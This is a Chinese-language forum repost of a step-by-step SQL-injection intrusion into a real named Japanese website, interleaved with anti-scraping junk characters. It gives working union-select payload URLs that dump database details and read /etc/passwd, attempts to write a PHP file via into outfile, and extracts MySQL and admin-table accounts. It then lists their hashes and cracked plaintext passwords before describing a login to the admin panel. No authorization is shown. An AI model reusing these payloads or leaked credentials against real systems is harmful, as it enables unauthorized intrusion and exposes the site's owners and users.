|
|
( u- w1 y0 F% o7 _. q
# r8 L5 d1 M5 w0x01. 检测 www.zuaa.jp 收集数据" {+ X# m$ M9 l' ?
/ v! [; m% T5 K7 `+ A! x
# O5 t4 S6 h. O0 mwhatweb
& E. W' d! L) ~( X( }9 P, W
% s# I* D( M9 c( S! `/ S" u4 Q" H- ]
利用NMAP扫描
9 ]- s1 k Q+ \
# a0 D$ U" w, X3 K9 M& N- X% m3 g中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
6 r8 [# W4 ?' E0x02.找注入点2 c# Q. `9 P$ C( [: H
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390, f7 b: h- G/ \- s
) L9 r# j) h2 R' o
t6 L' i3 ?0 z3 l0x03.order by! b* c- |$ f! U& U) t
http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
b, L' H1 j* N/ P3 r8 F9 X6 |! e$ \: I
order by 28报错,order by 27正常
6 g; W6 V3 d- ^
; m& R8 u& m; G4 `0x04. union手动查询. M$ r+ t* J: u! P/ _2 b3 u
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 " o9 j1 i+ ]& H, l9 ]0 v# X
添加到 27 时正常显示 8 W1 Q9 M/ Y% q2 h
( i. u1 o( j% l. k, w* w* B0 U中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
5 i( K3 S$ a& h$ Y, O
8 o5 @* u9 o V+ f/ z- n0x05. info:
" }" D* g( V' b1 z0 h; Ahttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
/ H$ Q& A0 }% Y$ u0 `
* x! s |9 {7 ], H+ O* duser: root@localhost
; ~ Y s' l0 Z& _! m, S! Idatabase: openpne3 f& F! p2 C1 U0 E; e p
version: 4.1.224 S) _: \0 m: R! o5 Q( ?2 z
os: portbld-freebsd5.4
0 b6 p/ Z9 E+ w4 l2 d, d; [# E0 d, F6 L) f
0x06. root用户
5 Y$ m) I; ` G' L I5 o利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
; H" M! Q5 v" E- _/ y: K/ Zhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 + W. h# T1 s2 R" B$ T
; s0 m8 X9 g. l+ o通过工具转换
! g% U1 U( v U5 x* u" f6 ]
' l9 I! h# W% x- v8 _/ G中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持9 L* b& V5 t5 i9 s3 Y
& ^2 L1 {5 U- j* L. ?0 d3 x; j. ^8 ]$ C0x07. 利用 into outfile. k$ l n% R/ c
全部都失败* R. v) ]8 H0 e/ V8 U
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
+ v0 s0 h: S& D& B/ [$ q* r: z3 T+ E5 w: n# g
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
9 D% X$ ]: ] m4 X, d" ^
$ P9 ~' @/ A; D. x页面显示“MDB2 Error:syntax error”
; N/ s5 }5 Q: Q7 F1 f
' i! X' i! B4 _1 @0x08. 利用 mysql 4.1* W4 t* B5 K$ L9 u/ p$ y: p- N
猜常规表名,字段未果 工具 sqlmap4 w6 _8 p; ~$ B0 e- O
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
$ e/ a* @. s* T8 B( l+ N
3 t- X/ v$ Q" d; C
) Y9 a- O& C- s7 Z' ]" \3 {
# ?2 M p# b5 c% i% l# D0x09. 查找后台. E8 s! d* E* k6 ~. j' j# l
利用 现有的各种 后台工具尝试都不行+ j4 v( ?+ ]2 @. u }
1 p, H' Y4 v2 R
0x10. MySL外联方法7 K# b l9 i( l* X9 |2 I
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
- x3 A0 J, i r) X8 _8 }7 Y可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user3 M; I z, n# {+ P8 S* f) h+ w" x
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user8 V. o* C- p/ e2 E. m t$ R
3 x! J4 {" f! t9 ], L这个可以在 www.cmd5.com 解密
/ M+ _0 t) O" ?! K' i) uroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
1 T1 d/ R* @4 e( {" ]& schen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
: t& W. ]3 D. f5 Gopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
1 I4 M% f* t& c# Z# nzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
* z- Z* {' r- z4 V2 e$ C工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知+ {2 i; Q d5 u @. g
: L6 J9 ]7 N' z2 f* | m* z, z" {* S9 F- u: h
0x11. 网站突破" |3 t3 N1 } s
发现网站的源程序 openpne, google 下载 openpne 源码 A; f' S/ A; s0 Y, ^! R, o
7 ]0 Y& V/ a) E, J
8 A3 P* q% ~) e) Y+ ?0x12. 默认信息利用* l( E: |# t i0 Z5 |6 r. n! p& X
http://sns.zuaa.jp/?m=admin&a=page_login
6 X9 f; s1 f" w# m7 F7 K8 ~( j* R t# u4 u6 a
表名 (c_admin_user) ,字段名(username,password)
8 R# f1 ^" i0 E" F, thttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
! j: T0 \9 H. L& P+ m, x7 V1 }
0 T2 S0 }- y! ?( g解密
9 b' K& s5 P @1 \% vzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa20096 }: N6 W/ c3 b' q
zuaajp:c0923ec5857796a393da99905008c176, zju1897% l* ^. d( T. R$ K
& f0 Z6 c# g) ~. n) Z+ f" R中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
3 \1 ~! H6 S& g& s8 E' F
' b! @ r2 f; V, H% t0 X. b1 m0x13. 登录后台' c5 Z8 s$ i+ x" t1 W( m# e
' Y& ?$ m6 m3 ]2 y, S1 T, q. Q" j8 Z2 p+ y$ e) \
6 z' J+ }7 x8 S ]0x14. 小结/ o/ P/ E8 }* L
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。7 H4 G- f a z2 V
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
& x% D" z$ k7 S0 j5 I------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain; K2 I7 T: d( Y: D: p
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持0 d+ [4 a; G; g1 v6 v+ E: b! t( H
0 e* S/ f8 |% Z# `0 e. [
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
( V9 t% D8 M8 ^/ F |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|